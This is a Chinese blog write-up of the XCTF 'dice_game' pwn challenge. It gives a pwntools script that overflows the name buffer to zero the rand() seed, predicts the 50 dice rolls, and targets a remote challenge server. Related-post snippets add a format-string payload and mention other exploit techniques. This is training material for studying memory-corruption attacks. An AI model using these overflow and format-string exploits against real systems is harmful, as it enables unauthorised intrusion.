ADworld pwn wp - dice_game

最新推荐文章于 2022-01-26 14:46:42 发布
最新推荐文章于 2022-01-26 14:46:42 发布
阅读量170 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/117873900
版权

在这里插入图片描述在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

因为是伪随机数, 所以可以覆盖seed的值, 然后得到伪随机数序列, 命中50次通关.

from pwn import *
from ctypes import *

libc = cdll.LoadLibrary("libc.so.6")
URL = "111.200.241.244"
PORT = 50956
sel = 1
io = process("./dice_game") if sel == 0 else remote(URL, PORT)

payload = cyclic(0x40) + p32(0)
io.recvuntil("Welcome, let me know your name: ")
io.sendline(payload)

Random = []
for i in range(50):
    Random.append(libc.rand() % 6 + 1)

for i in range(50):
    io.recvuntil("Give me the point(1~6): ")
    io.sendline(str(Random[i]))

io.interactive()

在这里插入图片描述

总结

py脚本调用c库函数

from ctypes import *
libc = cdll.LoadLibrary("libc.so.6")
libc.rand()
fa1c4
关注
专栏目录
adworld pwn dice_game分析
qq_39596232的博客
06-16 291
由于考研等种种原因,好久没有看pwn题了,这两天熟悉了一下,继续研究哈 这次分析的是攻防世界上的pwn练习题dice_game,可能太久没看pwn题了,已经有点忘记思路了,今天就当回顾一下啦 首先我们在ubuntu中看一下可执行文件基本信息: 没有canary保护,启用了栈不可执行,pie保护措施。64bit的elf文件,并且stripped 我们先尝试运行一下,看看程序功能,然后直接丢进IDA,分析代码: 主函是这样的,我们可以明显地发现存在缓冲区溢出漏洞,开始的时候我在想能不..
攻防世界-pwn dice_game(栈内变量覆盖)
菜的只能随便写写博客
10-09 555
  0x01 检查文件  下载附件之后获得两个文件,一个可执行文件和一个libc,初步理解要使用libc。 64位elf 无栈保护 动态链接   0x02 程序分析  根据程序运行分析,程序应该是要求猜字,连续答对50轮可获得flag。   0x03 IDA结构分析  从里面分析,可以看到程序的结构,while循环里面是猜字的流程,一共50轮,并可以注意到18行设置了随机的种子。...
攻防世界dice_game(pwn)
CTF小白的博客
05-08 4677
dice_game 题目考察:rand()生成的随机和随机种子seed()有关,通过观察题目,可以发现存在溢出漏洞,通过输入可以覆盖到seed(),实现一个可预测的随机列。 题目分析 这边就可以看到,buf覆盖0x40位就能覆盖到seed。 sub_A20()如下,就是比较你输入的是否和产生的随机相等。 当回答正确50次时,会执行sub_B28这个函,读取flag。 所以我们要做...
pwn学习(二)
qq_37439229的博客
10-02 843
今天主要刷了点题,学到个格式化字符串泄漏cancary fm from pwn import * #p = process('./main') p = remote('node3.buuoj.cn',28633) payload = '%4c%13$n' + p32(0x804a02c) p.send(payload) #print(p.recv()) p.interactive() 格式化字符串覆盖小字 jarvisoj_tell_me_something from pwn import * p =
攻防世界 Pwn 进阶 第一页
yongbaoii的博客
10-19 3042
写在最前面 我在某天中午睡了一觉之后大彻大悟 我感觉pwn最重要的是能不能找得到漏洞点,学会怎么利用这个漏洞点以及明白他的原理倒是要往后放一放,所以要来一个漏洞总结,总结我现在见到过的所有漏洞、漏洞的原理以及它的表现形式,就在攻防世界第一页之后吧,以题的形式去进行一些总结。 00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区。 攻防世界 Pwn 新手 1、栈溢出,从简单到难,开始有后门函,到需要自己写函,到最后的ret2libc。 常见漏洞点有read()函、gets()函、strca
ADworld pwn wp - hacknote
fa1c4的blog
08-30 215
前言 攻防世界的一道pwn, UAF漏洞 https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4717&page=2 分析过程 void __cdecl __noreturn main() { int v0; // eax char buf[4]; // [esp+8h] [ebp-10h] BYREF unsigned int v2; // [esp+Ch] [ebp-Ch
ADworld pwn wp - pwn-200
fa1c4的blog
06-25 157
明显的栈溢出, 动态链接, 无libc利用, ret2libc, 板子打法, 用pwntools的DynELF模块泄露libc地址, 原理是结合puts或writes函泄露地址, 所以有两个利用条件: 漏洞可以泄露libc地址 漏洞可以反复利用(ret 回到函开头继续执行) write函 头文件:#include <unistd.h> 定义函:ssize_t write (int fd, const void * buf, size_t count); 函说明:write(...
adworld-crypto-RSA_gcd
bunner_的博客
10-21 673
给定两个不同的n的时候一定要看看n1,n2有没有最大公约(素),如果有,那么该最大公约就是两者共同的p 给定两个相同的n的时候,那就要考虑共模攻击了 拿到题目,有两个文件,里面分别有n,e,c 看了一下两份文件的e相同,n不同 题目的名字是RSA_gcd,自然想到了求n1n_1n1​,n2n_2n2​的最大公约 求出的最大公约若为素的话,那么它就是p,题目自然就解出来了 import gmpy2 def get_p(n1, n2): p = gmpy2.gcd(n1, n2)..
adworld攻防世界-pwn-新手区-wp
令则
03-05 1173
adworld-pwn-新手区 tcl 到现在才算是正经昨晚攻防世界的pwn新手区, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机覆盖种子、整溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
idapython_攻防世界no-strings-attached_逆向之旅007
weixin_43281394的博客
01-07 716
提示:这篇文章里涉及到:idapython,gdb,idapython中文手册.pdf百度云链接 攻防世界no-strings-attached_逆向之旅007前言一、攻防世界no-strings-attached二、writeup1.用exeinfo看一下2.在linux下运行3.分析三、总结 前言 本题的摘要: 文件是linux下的elf文件,但是运行报错。有两个解题思路,第一种是用gdb在linux虚拟机下动态调试,第二种是使用ida静态分析,然后构建脚本计算出flag。 今天距离写上一篇博客有
dice_game XCTF 4th-QCTF-2018
qq_41071646的博客
04-27 1089
其实感觉这个题 不算是pwn题。。。 这 pwn 里面就是 读取flag 文件 然后我们看一下 sub_a20 这个函 随机啊 本来我没有想用 把种子给 覆盖掉 但是 time(0) 感觉不稳 时间一万一不对劲 那么随机 也会出错 所以干脆 把种子固定下来 下面是 exp #coding:utf-8 from pwn import* list...
pwntools中fmtstr的使用
fa1c4的blog
02-01 4038
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
kali安装checksec
fa1c4的blog
01-26 3386
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3358
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
Ubuntu16.04 pip安装pwntools出错
fa1c4的blog
02-23 3055
具体出错过程 Ubuntu16.04装pip, 然后用pip装pwntools会提示pip版本过低, 按给的命令更新之后pip就崩了 解决 先卸载pip https://blog.csdn.net/qq_33976344/article/details/113991528 然后下载文件进行安装 curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py" python3 get-pip.py python2 get-pip.py # 提示 ERR
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2961
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);
Ubuntu安装checksec
fa1c4的blog
04-15 2666
环境配置, 纯命令行解决. # install git sudo apt-get install git ### cd git clone https://github.com/slimm609/checksec.sh sudo ln -sf ~/checksec.sh/checksec /usr/local/bin/checksec 经测试, 适用大部分版本Ubuntu.
Adworld2012互联网营销大会PPT资源:新媒体运营、移动营销解析
"Adworld2012互联网营销世界大会PPT下载" 本次Adworld2012互联网营销世界大会汇集了众多业界专家和企业代表,共同探讨了互联网营销的前沿趋势和策略。会议涵盖的主题广泛,包括新媒体运营、体育营销、移动营销创新...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值